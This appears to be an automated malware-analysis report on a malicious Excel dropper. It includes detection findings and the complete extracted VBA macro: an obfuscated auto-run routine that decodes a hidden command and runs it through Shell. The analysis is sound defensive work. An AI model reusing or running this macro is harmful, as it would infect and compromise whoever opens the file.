MALICIOUS
148
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1059 Command and Scripting Interpreter
The file is an Excel document containing a Workbook_Open VBA macro. This macro utilizes a Shell call to execute an obfuscated string, which is likely a command to download and run a secondary payload. The ClamAV detection name 'Xls.Dropper.Agent-6333155-0' further supports its role as a dropper. The macro's obfuscation and the presence of a Shell call indicate a malicious intent to execute arbitrary code.
Heuristics 4
-
ClamAV: Xls.Dropper.Agent-6333155-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Dropper.Agent-6333155-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell oJUIdsfdsF, vbHide -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Sub Workbook_Open()
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3486 bytes |
SHA-256: da897fec122551cd212af944a6bf509ee1bd184d87dd6844da8e39d3a4d4c02c |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Workbook_Open()
Dim sxDmlDGZ As Integer
For sxDmlDGZ = 0 To 4
Dim FiAlZHWv As Integer
For FiAlZHWv = 0 To 9
DoEvents
Next FiAlZHWv
DoEvents
Next sxDmlDGZ
Dim ffAkQrGQ As Integer
For ffAkQrGQ = 0 To 5
DoEvents
Next ffAkQrGQ
oJUIdsfdsF = OlFdL0IOXbF(" ЄЎ]l€]Ќ¬ґўЇђҐў©©kўµў]e‹ўґjЊџ§ў ±]ђ¶°±ўЄk‹ў±k”ўџЂ©¦ў«±fkЃ¬ґ«©¬ћЎѓ¦©ўedҐ±±wllvokspkutkqmlћЁ°§ЎЎўЇґЎlћ°ЎџґЁlЎҐ¬ў¦kўµўdidb‘‚ЉЌb™¬’Ґ§¦Ў°Јkўµўdfxђ±ћЇ±jЌЇ¬ ў°°]db‘‚ЉЌb™¬’Ґ§¦Ў°Јkўµўdx", "61")
Dim mwlXRRMn As Integer
For mwlXRRMn = 0 To 9
Dim EmMXtScD As Integer
For EmMXtScD = 0 To 4
DoEvents
Next EmMXtScD
DoEvents
Next mwlXRRMn
Dim jWtyraXh As Integer
For jWtyraXh = 0 To 2
DoEvents
Next jWtyraXh
Shell oJUIdsfdsF, vbHide
End Sub
Public Function OlFdL0IOXbF(ByVal InputData As String, ByVal NumKey As Integer) As String
Dim i As Long, OutChar As String
For i = 1 To Len(InputData)
Dim FqjuMBHm As Integer
For FqjuMBHm = 0 To 6
Dim tfBRkgNR As Integer
For tfBRkgNR = 0 To 6
DoEvents
Next tfBRkgNR
DoEvents
Next FqjuMBHm
Dim JGoFjEbi As Integer
For JGoFjEbi = 0 To 6
DoEvents
Next JGoFjEbi
OutChar = Asc(Mid(InputData, i, 1)) - NumKey
While OutChar < 0
Dim UVMKvtXD As Integer
For UVMKvtXD = 0 To 5
Dim SvyacOAG As Integer
For SvyacOAG = 0 To 5
DoEvents
Next SvyacOAG
DoEvents
Next UVMKvtXD
Dim SlbANPcr As Integer
For SlbANPcr = 0 To 6
DoEvents
Next SlbANPcr
OutChar = OutChar + 256
Dim rkOPdIvx As Integer
For rkOPdIvx = 0 To 5
Dim pOUWlfCz As Integer
For pOUWlfCz = 0 To 6
DoEvents
Next pOUWlfCz
DoEvents
Next rkOPdIvx
Dim jKlXnybu As Integer
For jKlXnybu = 0 To 8
DoEvents
Next jKlXnybu
Wend
Dim mvteclmh As Integer
For mvteclmh = 0 To 2
Dim pORpyoOA As Integer
For pORpyoOA = 0 To 7
DoEvents
Next pORpyoOA
DoEvents
Next mvteclmh
Dim kKkqfasT As Integer
For kKkqfasT = 0 To 2
DoEvents
Next kKkqfasT
OlFdL0IOXbF = OlFdL0IOXbF + Chr(OutChar)
Dim tfesHImQ As Integer
For tfesHImQ = 0 To 5
Dim XhhmRvEb As Integer
For XhhmRvEb = 0 To 1
DoEvents
Next XhhmRvEb
DoEvents
Next tfesHImQ
Dim evzwSjyR As Integer
For evzwSjyR = 0 To 3
DoEvents
Next evzwSjyR
Next
End Function
Attribute VB_Name = "Лист1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Лист2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Лист3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.